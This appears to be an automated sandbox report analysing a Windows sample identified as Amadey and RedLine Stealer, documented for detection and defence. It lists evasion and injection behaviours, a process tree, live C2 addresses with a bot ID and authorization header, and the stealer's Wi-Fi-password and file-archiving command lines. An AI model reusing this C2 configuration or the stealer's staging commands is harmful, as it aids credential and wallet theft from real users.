Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yINR7uQlPr.exe

Overview

General Information

Sample name:yINR7uQlPr.exe
renamed because original name is a hash value
Original sample name:1bbc3bff13812c25d47cd84bca3da2dc.exe
Analysis ID:1574171
MD5:1bbc3bff13812c25d47cd84bca3da2dc
SHA1:d3406bf8d0e9ac246c272fa284a35a3560bdbff5
SHA256:0a17e2ca8f223de67c0864fac1d24c7bb2d0c796c46e9ce04e4dff374c577ea1
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to start a terminal service
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • yINR7uQlPr.exe (PID: 3332 cmdline: "C:\Users\user\Desktop\yINR7uQlPr.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
    • svchost.exe (PID: 2888 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 1DC30FADAFF92643095942.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
          • svchost.exe (PID: 5576 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 5304 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 2228 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • CC11.tmp.ctx.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
          • CC11.tmp.ctx.exe (PID: 4160 cmdline: "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
        • 1DC30FADAFF92643095942.exe (PID: 3876 cmdline: "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)
          • svchost.exe (PID: 6596 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 5840 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 6572 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • D7AB.tmp.ssg.exe (PID: 4444 cmdline: "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • EC2F.tmp.gfx.exe (PID: 3348 cmdline: "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
          • Gxtuum.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
    • audiodg.exe (PID: 4204 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • msiexec.exe (PID: 2656 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • Gxtuum.exe (PID: 3408 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
    • rundll32.exe (PID: 5340 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 2164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 6256 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6624 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6020 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6664 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 1268 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6176 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 3876 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1248 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
    • update.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\10000820101\update.exe" MD5: DD1E3F38AE7711D270748012AF613950)
      • svchost.exe (PID: 5596 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • audiodg.exe (PID: 5608 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
      • msiexec.exe (PID: 6616 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • update.exe (PID: 2452 cmdline: "C:\Users\user\AppData\Local\Temp\10000830101\update.exe" MD5: DD1E3F38AE7711D270748012AF613950)
      • svchost.exe (PID: 6632 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • audiodg.exe (PID: 5012 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
      • msiexec.exe (PID: 3228 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • ssg.exe (PID: 2640 cmdline: "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 4 entries
                SourceRuleDescriptionAuthorStrings
                00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0x3c9dd:$s2: ReflectiveLoader@
                    00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 8 entries
                        SourceRuleDescriptionAuthorStrings
                        17.0.D7AB.tmp.ssg.exe.5c0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          19.2.Gxtuum.exe.7a0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                            20.2.Gxtuum.exe.7a0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                              4.0.explorer.exe.3320000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                              • 0x3b5dd:$s2: ReflectiveLoader@
                              1.2.svchost.exe.17002c7d000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                              • 0x3b5dd:$s2: ReflectiveLoader@
                              Click to see the 14 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yINR7uQlPr.exe, ProcessId: 3332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yINR7uQlPr.exe", ParentImage: C:\Users\user\Desktop\yINR7uQlPr.exe, ParentProcessId: 3332, ParentProcessName: yINR7uQlPr.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2888, ProcessName: svchost.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yINR7uQlPr.exe", ParentImage: C:\Users\user\Desktop\yINR7uQlPr.exe, ParentProcessId: 3332, ParentProcessName: yINR7uQlPr.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2888, ProcessName: svchost.exe

                              Stealing of Sensitive Information

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2164, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6256, ProcessName: netsh.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:36.421957+010020445971A Network Trojan was detected192.168.2.549775185.81.68.14780TCP
                              2024-12-13T01:37:39.825443+010020445971A Network Trojan was detected192.168.2.549792185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:27.096738+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.549738TCP
                              2024-12-13T01:38:05.490439+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.549876TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:26.656312+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:32.149745+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:33.161554+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:33.618848+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:34.850542+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:35.288592+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:35.765758+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:36.213761+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:36.859262+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:37.364802+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:38.264018+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:39.039789+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:39.159660+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:40.750025+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:41.311807+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:41.758939+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:42.214100+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:42.925495+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:43.439327+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:43.879129+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:44.353023+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:44.754750+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:45.254752+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:45.633409+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:46.070832+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:37:46.558826+010020432311A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:38:05.047064+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:10.649831+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:11.496837+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:12.106689+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:13.724329+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:14.163329+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:14.601349+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:15.038142+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:15.587566+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:16.246286+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:16.944208+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:17.552415+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:19.335808+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:19.775980+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:20.215536+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:20.655213+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:22.416404+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:22.858077+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:23.399506+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:23.835507+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:24.273386+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:24.713912+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              2024-12-13T01:38:25.235281+010020432311A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:33.281672+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.549738TCP
                              2024-12-13T01:38:11.616615+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.549876TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:06.461578+010020197142Potentially Bad Traffic192.168.2.549707185.81.68.14780TCP
                              2024-12-13T01:37:17.775120+010020197142Potentially Bad Traffic192.168.2.549711185.81.68.14780TCP
                              2024-12-13T01:37:22.874431+010020197142Potentially Bad Traffic192.168.2.549726185.81.68.14780TCP
                              2024-12-13T01:38:01.525345+010020197142Potentially Bad Traffic192.168.2.549867185.81.68.14780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:26.656312+010020460451A Network Trojan was detected192.168.2.549738185.81.68.1471912TCP
                              2024-12-13T01:38:05.047064+010020460451A Network Trojan was detected192.168.2.549876185.81.68.1471912TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:30.835138+010028561471A Network Trojan was detected192.168.2.549752185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:33.820737+010028561481A Network Trojan was detected192.168.2.549761185.81.68.14880TCP
                              2024-12-13T01:37:40.305964+010028561481A Network Trojan was detected192.168.2.549791185.81.68.14880TCP
                              2024-12-13T01:37:46.805970+010028561481A Network Trojan was detected192.168.2.549813185.81.68.14880TCP
                              2024-12-13T01:37:52.947721+010028561481A Network Trojan was detected192.168.2.549832185.81.68.14880TCP
                              2024-12-13T01:37:59.165288+010028561481A Network Trojan was detected192.168.2.549857185.81.68.14880TCP
                              2024-12-13T01:38:05.257576+010028561481A Network Trojan was detected192.168.2.549877185.81.68.14880TCP
                              2024-12-13T01:38:11.876385+010028561481A Network Trojan was detected192.168.2.549900185.81.68.14880TCP
                              2024-12-13T01:38:17.981386+010028561481A Network Trojan was detected192.168.2.549922185.81.68.14880TCP
                              2024-12-13T01:38:24.207994+010028561481A Network Trojan was detected192.168.2.549943185.81.68.14880TCP
                              2024-12-13T01:38:30.823168+010028561481A Network Trojan was detected192.168.2.549962185.81.68.14880TCP
                              2024-12-13T01:38:36.964250+010028561481A Network Trojan was detected192.168.2.549983185.81.68.14880TCP
                              2024-12-13T01:38:43.321073+010028561481A Network Trojan was detected192.168.2.550002185.81.68.14880TCP
                              2024-12-13T01:38:49.554536+010028561481A Network Trojan was detected192.168.2.550023185.81.68.14880TCP
